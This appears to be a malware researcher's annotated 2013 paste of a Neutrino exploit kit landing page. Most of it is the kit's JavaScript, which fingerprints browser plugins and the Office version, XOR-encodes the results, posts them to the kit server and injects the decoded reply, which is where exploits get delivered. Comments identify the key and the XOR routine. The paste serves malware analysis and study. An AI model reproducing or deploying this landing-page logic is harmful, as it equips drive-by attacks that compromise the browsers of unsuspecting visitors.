#MalwareMustDie! New form of Neutrino EK landing page?

1. // #MalwareMustDie!
2. // My personal note..
3. // New form of Neutrino EK landing page?
4. // A quest! Where's the XOR data now? :-D
5.  
6.  
7. <script src='xsvhwjx.js'></script>
8. <script src='qmqsfiutp.js'>
9. </script><script src='hrcl.js'></script>
10. <link href='xbbcukphokdo.css' rel='stylesheet'>
11. <link href='nhpgbsrcogf.css' rel='stylesheet'>
12. <link href='bbehoufqwh.css' rel='stylesheet'>
13.  
14. <script src='gdhclsjileqh.js'></script>
15. <script src='nrezixfqsy.js'></script>
16. <script src='sgxvswm.js'></script>
17. <script src='ztblmkuxokfcyxgy.js'></script>
18. <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
19. <script src='dwwccp.js'></script>
20. <script src='zkbvwzvq.js'></script>
21.  
22.  
23. <script>
24.  $(document).ready(function()
25.  {
26.    rq(
27.         "51f2394faaa2cc390a075f4c",
28.         "eyhuui",        // <== @malforsec & @malwaremustdie: OK this is the key :-)
29.         "uvkotuiae",    // <=== @malwaremustdie: POST command value
30.         "ngrdddfrrlrzro",
31.         "gfsjmndvvz"
32.      )
33.  }
34.  );
35.  function rq(a,c,f,e,g)
36.  {
37.    var d=PluginDetect.getVersion,b=[];  // // <== @malwaremustdie: PoC of PluginDetect v0.8.0
38.    b.push("hid:::"+a);
39.    b.push("adobe_reader:::"+d("AdobeReader"));
40.    b.push("java:::"+d("Java"));
41.    b.push("flash:::"+d("Flash"));
42.    b.push("quick_time:::"+d("QuickTime"));
43.    b.push("real_player:::"+d("RealPlayer"));
44.    b.push("shockwave:::"+d("Shockwave"));
45.    b.push("silver_light:::"+d("Silverlight"));
46.    b.push("vlc:::"+d("VLC"));
47.    b.push("wmp:::"+d("WMP"));
48.    b.push("office:::"+office_ver());
49.    a={};
50.    a[e]=c;                                        // <=== c = "51f2394faaa2cc390a075f4c"
51.    a[g]=encodeURIComponent(www(b.join(";;;"),c));  // <== @malwaremustdie: Assembling the POST query.
52.    $.post(f,a,function(a,
53.    b)
54.    {
55.      $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.
56.    }
57.    )
58.  }
59.  function www(a,c)        // <=== @malwaremustdie: XOR function name in camouflaged
60.  {                      
61.    for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic
62.        g=Math.floor(e%c.length),
63.        f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g));
64.    return f
65.  }
66.  function office_ver()
67.  {
68.    var a=0,c=0;
69.    try
70.    {
71.      a=new ActiveXObject("SharePoint.OpenDocuments.4")
72.    }
73.    catch(f)
74.    {
75.    }
76.    try
77.    {
78.      c=new ActiveXObject("SharePoint.OpenDocuments.3")
79.    }
80.    catch(e)
81.    {
82.    }  // <=== @malwaremustdie: here goes the exploit payloads access...
83.    return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null
84.  };
85.  
86. </script>
87.  
88.  
89. ----
90. #MalwareMustDie!
91. @unixfreaxjp ~]$ date
92. Sat Jul 27 01:17:40 JST 2013